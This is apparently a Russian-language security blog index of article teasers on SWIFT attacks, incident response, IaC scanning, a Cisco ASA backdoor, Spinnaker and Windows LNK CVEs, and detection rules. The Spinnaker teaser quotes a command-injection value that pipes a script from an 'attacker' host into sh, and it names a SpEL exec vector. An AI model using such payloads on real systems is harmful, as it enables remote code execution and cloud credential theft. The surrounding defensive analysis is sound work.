Кибербезопасность
По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.
Статья Атаки на SWIFT и межбанковские системы: kill chain от фишинга до вывода средств
19 дней от spear-phishing до операторского АРМ SWIFT в банке из топ-30. Один сервисный аккаунт с правами на обе зоны превратил формальную сегментацию в декорацию.Bangladesh Bank — $81 млн за одну ночь, Lazarus модифицировал Alliance Access для подавления печати подтверждений. «Глобэкс» — первый SWIFT-вывод в России, Cobalt от initial access до вывода за 3-4 недели. Valid Accounts (T1078) с реальными credentials оператора: аутентификация выглядит легитимно — SIEM молчит.
Полный kill chain с маппингом MITRE ATT&CK: T1566.001 → T1056.001 → T1078 → T1565.002 → T1657. Два Sigma-правила: логин оператора вне рабочего времени и создание файлов в директории Alliance Access. Матрица контролей SWIFT CSP против каждой фазы — и почему CSP не защищает от атаки через офисный сегмент.
Cobalt и Lazarus приходят изнутри, а не из интернета.Статья Реагирование на инциденты информационной безопасности: от алерта до изоляции за 30 минут
Понедельник 9:15 — mass file encryption. Через 12 минут ещё три хоста. Атакующие сидели неделю, данные уже ушли. Разница между «под контролем» и «на DLS» — первые 30 минут триажа.75% вторжений используют валидные credentials, медианный dwell time — 11 дней, 57% организаций узнают от внешней стороны. Decision tree триажа: единичный алерт или кластер → маппинг TTPs на MITRE ATT&CK → критичность актива → lateral movement. Lateral movement — проверяйте первым, а не последним.
Три параллельных потока для определения масштаба: EDR-телеметрия, SIEM за 14 дней назад, NetFlow на beaconing. Memory dump — до любых действий. Chain of custody — SHA256 + UTC + ФИО аналитика. Sigma-правило на mass share access и минимальный detection-чеклист для SOC.
Главный вывод: decision matrix «кто нажимает isolate без согласования» важнее любого playbook.Статья Безопасность Infrastructure as Code: от мисконфигурации в Terraform до detection-правила в SIEM
Capital One, LA Times, Twilio — три инцидента, три мисконфигурации, которые ловятся checkov -d . за секунды. Четыре года IaC-сканирования в production: ни одна найденная проблема не добралась до прода.Пять категорий: публичный доступ (T1580), wildcard IAM (T1078.004), отсутствие шифрования (T1552.001), пробелы в логировании (T1562.008), избыточный сетевой доступ. Две стратегии: HCL-скан на этапе PR за секунды, план-скан перед apply — ловит динамические выражения и переменные. Checkov, Trivy, KICS, Terrascan — выбор по стеку.
Главная слепая зона: configuration drift. Разработчик добавил 0.0.0.0/0 через консоль — сканер молчит. CSPM + SIEM-правило на AuthorizeSecurityGroupIngress не от CI/CD role — второй эшелон. Suppression rate как метрика: 200 skip-аннотаций в репо — сканер стал формальностью.
Detection-чеклист CloudTrail событий с MITRE ATT&CK для SOC.Статья FIRESTARTER на Cisco ASA: как бэкдор переживает патчи
6 месяцев dwell time на пропатченном Cisco Firepower: патч закрыл дверь, а FIRESTARTER уже внутри. Graceful shutdown — момент, когда имплант прописывает автозапуск в CSP_MOUNT_LIST.UAT-4356 (ArcaneDoor): CVE-2025-20362 (PR:N, автоматизируема) + CVE-2025-20333 (CVSS 9.9, RCE) через WebVPN. FIRESTARTER живёт в LINA-процессе — show version, show running-config, syslog молчат. Magic packet через WebVPN активирует без эксплуатации CVE. Полностью пропатченное устройство доступно бессрочно.
CSP_MOUNT_LIST модифицируется при SIGTERM → boot восстанавливает её до чистого состояния. Firmware upgrade = graceful shutdown = имплант выживает. Удаляет только hard power cycle или полный reimage. IBM X-Force: среднее время устранения CVE — 29 месяцев. CISA дала один день.
CLI-команда для проверки + YARA IOC + decision tree при подозрении на компрометацию.Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.Статья Network Policies в Kubernetes: изоляция подов на практике
По умолчанию каждый под в вашем кластере видит все остальные - flat network без границ. Один скомпрометированный контейнер открывает атакующему полный доступ к production-сервисам, базам данных и внутренним API. Именно так выглядит lateral movement в реальных инцидентах.
В этой статье разберём, как Network Policies превращают хаотичную сеть кластера в управляемые сегменты: синтаксис и логику политик, почему стандартный K8s API - это только половина решения, и чем Calico с Cilium закрывают то, что ванильный Kubernetes не умеет. Практический разбор: GlobalNetworkPolicy и DNS-based rules в Calico, L7-фильтрация HTTP-трафика и identity-based security в Cilium, паттерны default deny и микросегментации - с реальными YAML-манифестами и командами для проверки.Статья Харденинг Windows 10/11 после окончания поддержки: чеклист для пентестера и администратора
120 машин на Windows 10 22H2 после EOL — дефолтные GPO, открытый SMBv1, LSASS без RunAsPPL. Mimikatz снимал хеши без сопротивления. Три пентеста, один чеклист.После 14 октября 2025 каждая новая CVE в ядре Windows 10 — перманентный 0-day. Diff между патчем Windows 11 и непропатченной Win10 публикуется открыто — готовый Exploitation for Privilege Escalation T1068. Defender обновляет сигнатуры до 2028, но дыру в win32k.sys антивирусная сигнатура не заткнёт.
Три GPO за 15 минут закрывают 70% типового внутреннего пентеста: RunAsPPL + WDigest off (T1003.001), SMBv1 off (relay, legacy RCE), LLMNR/NBT-NS off (Responder за минуты). Таблица приоритетов из 8 мер: эффект к сложности, закрываемый ATT&CK-вектор для каждой.
HardeningKitty + PingCastle для автоматического аудита по CIS Benchmark v3.0.0.Статья Smoke тестирование и качество обратной связи: от прогона до действия в CI/CD
Smoke-тест поймал сломанный платёжный эндпоинт — но gate пропустил сборку по правилу «pass if >90%». В субботу клиенты не смогли оплатить заказ. Проблема не в тестах, а в feedback loop.Smoke без обратной связи — дымовой датчик с отключённой сиреной. allow_failure: true в GitLab CI превращает gate в декорацию. Уведомление в общий канал из 40 человек — никто не реагирует. Flaky rate выше 2% — команда перестаёт верить gate и начинает его обходить.
Четыре звена feedback loop: детекция → адресная нотификация автору коммита → диагностика с контекстом (Expected 200, got 503) → fix и перезапуск. Pytest + GitLab CI с allow_failure: false, маркеры critical/advisory для двух уровней gate, метрики: pass rate, MTTF, flaky rate, suite duration.
Проверка: уроните smoke намеренно и засеките, когда разработчик узнает.Статья CVE-2026-32202: уязвимость Windows Shell — zero-click кража NTLM-хешей через LNK-файлы
CVE-2026-32202: неполный патч февраля оставил zero-click кражу Net-NTLMv2 через .lnk — открыл папку в Explorer, хеш уже у атакующего. CVSS 4.3, но в домене это lateral movement.Microsoft залатал RCE (CVE-2026-21510, CVSS 8.8), но не тронул механизм аутентификации. Windows Shell резолвит UNC-путь из .lnk ещё до SmartScreen — SMB-хендшейк происходит на этапе path resolution. Responder перехватывает Net-NTLMv2 без единого клика. По документам UI:R, по факту — открытие папки в Explorer.
NTLM relay на Exchange/LDAP/SMB без SMB Signing, offline hashcat -m 5600 — C:L в CVSS не учитывает каскадный эффект. APT28 использовала тот же класс в январской кампании против Украины. CISA KEV, дедлайн 12 мая для федеральных агентств.
Sigma-правило: explorer.exe + outbound TCP 445 вне internal subnet — высокоприоритетный алерт.Статья Утечка данных криптобиржи в России 2026: взлом Grinex на $13,7 млн — разбор TTPs и detection-чеклист для SOC
Взлом Grinex: $13,7 млн за минуты. Преемник Garantex под санкциями США — и те же уязвимости в архитектуре. Kill chain по MITRE ATT&CK и Sigma-правила для SOC на реальных TTPs Q1 2026.Grinex запустился в марте 2026 как замена Garantex после блокировки FinCEN. Архитектура воспроизводилась в спешке — и воспроизвела уязвимости. Атака использовала скомпрометированные API-ключи и инсайдерский доступ к горячим кошелькам. Классический паттерн: privileged credential abuse без аномального детекта.
Разбор TTP: Initial Access через stolen API keys, lateral movement по внутренним сервисам без MFA, вывод через mixer-цепочку. Sigma-правила на аномальные API-запросы и массовый вывод. Чеклист для SOC финтех/крипто-платформ: privileged access audit, аномалии транзакций, мониторинг горячих кошельков.
Маппинг на MITRE ATT&CK и detection checklist.